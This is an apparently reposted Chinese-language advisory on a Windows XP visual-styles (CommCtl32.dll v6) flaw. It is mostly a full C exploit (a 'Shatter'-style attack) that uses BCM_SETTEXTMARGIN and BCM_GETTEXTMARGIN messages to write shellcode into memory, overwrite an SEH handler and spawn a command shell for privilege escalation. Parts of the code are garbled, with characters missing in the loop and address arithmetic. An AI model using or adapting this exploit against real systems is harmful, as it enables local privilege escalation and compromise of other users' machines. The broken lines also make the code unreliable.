Windows XP 圖像式樣可執行任意代碼 http://www.rvibo.y365.com/rj/hac[68].HTM by tiger:     受影響系統：    NetScreen ScreenOS 3.1.1r2 Windows XP     漏洞描述： XP的圖像式樣特徵是使用各種控制機構對XP介面進行優化，並在作業系統中引入了一個新的碎片類型。 應用程式使用一個CommCtl32.dll（版本6）文件來表現新的類似XP的介面，這個dll文件必須明確地在程式中指定使用，除了讓介面漂亮之外，CommCtl32.dll還引入了幾種新的windows按鈕控制方法： * BCM_GETIDEALSIZE  * BCM_GETIMAGELIST  * BCM_GETTEXTMARGIN  * BCM_SETIMAGELIST  * BCM_SETTEXTMARGIN  這兩個 'TEXTMARGIN' 消息使用了RECT類型（這是windows廣泛採用的一種資料結構，通常作爲參數傳遞給許多api函數。RECT結構表示一個矩形區域，left和top欄位描敘了矩形第一個角（通常是左上角），right和bottom欄位描敘了矩形的第二個角（通常是右下角）。這兩個位置決定了矩形的大小與位置。這些欄位採用的單位及坐標系統取決於當前的有效縮放比例、準備表示的物件以及準備調用的api函數。並不要求bottom欄位的絕對值大於top欄位，而且也可以爲負數。）當發送windows消息時，許多使用這個公共圖像模式的控制機構能被執行，甚至用一段簡單的代碼也能寫入任意指令到一個使用了新XP按鈕控制的應用程式中去。任何使用了XP圖像式樣的特權程式或在交互桌面打開一個視窗都能被利用來讓攻擊者提高許可權。  #include  #define _WIN32_WINNT 0x501 #include #include // Local Cmd Shellcode. // Added a loadLibrary call to make sure msvcrt.dll is present -- ol BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="Calculator";// The name of the main window #define SEH_HANDLER_ADDR 0x77ed73B4 // Critical Address To Overwrite // you might want to find a less destructive spot to stick the code, but this works for me --ol #define SHELLCODE_ADDR 0x77ed7484 // Known Writeable Space Or Global Space // The range between these will be scanned to find our shellcode bytes. #define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32 #define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where we stop looking for bytes. void doWrite(HWND hWnd, BYTE tByte, BYTE* address); void IterateWindows(long hWnd); void *FindByteInKernel32( BYTE byte ); void ErrorTrace(const char *msg, DWORD error) { DWORD numWritten; WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL); if (error) { LPTSTR lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, error, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL ); WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL); // Free the buffer. LocalFree( lpMsgBuf ); } } //"Should there be a reason to believe that code that comes from a variety //of people, unknown from around the world, should be somehow of higher quality //than that from people who get paid to do it professionally?" // - Steve Ballmer // (Hey, wait, are MS employees generally household names? // Isn't MS an equal opportunity employer?) int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with CommCtrl 6.0 messages\n"); printf("%% Oliver Lavery.\n\n"); printf("%% based on Shatter SEH code by\n"); printf("%% brett moore security-assessment com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf(" Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf(" Couldn't Find %s Window\n",tWindow); return 0; } printf(" Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf(" Not Done...\n"); return 0; } void *FindByteInKernel32( BYTE byte ) { BYTE *addr = KERN32_BASE_ADDR; while ( addr < KERN32_TOP_ADDR ) { if ( *addr == byte ) return addr; addr ; } ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0 ); exit(0); } //"Should there be any reason to believe that a relatively small group of //paid programmers working under the direction of a marketing machine can produce //code approaching the quality of a global team linked by the internet, whose //every line of code is subject to ruthless peer review, and whose only standard //is excellence?" // - crunchie812 void doWrite(HWND hWnd, BYTE tByte, BYTE *address) { void *byte_addr; byte_addr = FindByteInKernel32( tByte ); SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr); if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) { ErrorTrace( "error", GetLastError() ); } } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); while ( strcmp(g_classNameBuf, "Button") ) { // IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); } if(childhWnd != NULL) { printf(" Found button control..0x%xh\n",childhWnd); // Inject shellcode to known address printf(" Sending shellcode to...0x%xh\n", SHELLCODE_ADDR); for (looper=0;looper> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR 1); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR 2); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR 3); // Cause exception printf(" Forcing Unhandled Exception\n"); doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF); printf(" Done...\n"); exit(0); } } 攻擊代碼： 來源：c ------------------------------------------------------------------ 沒有修補的 請快去更新把 希望防火牆 能完全防堵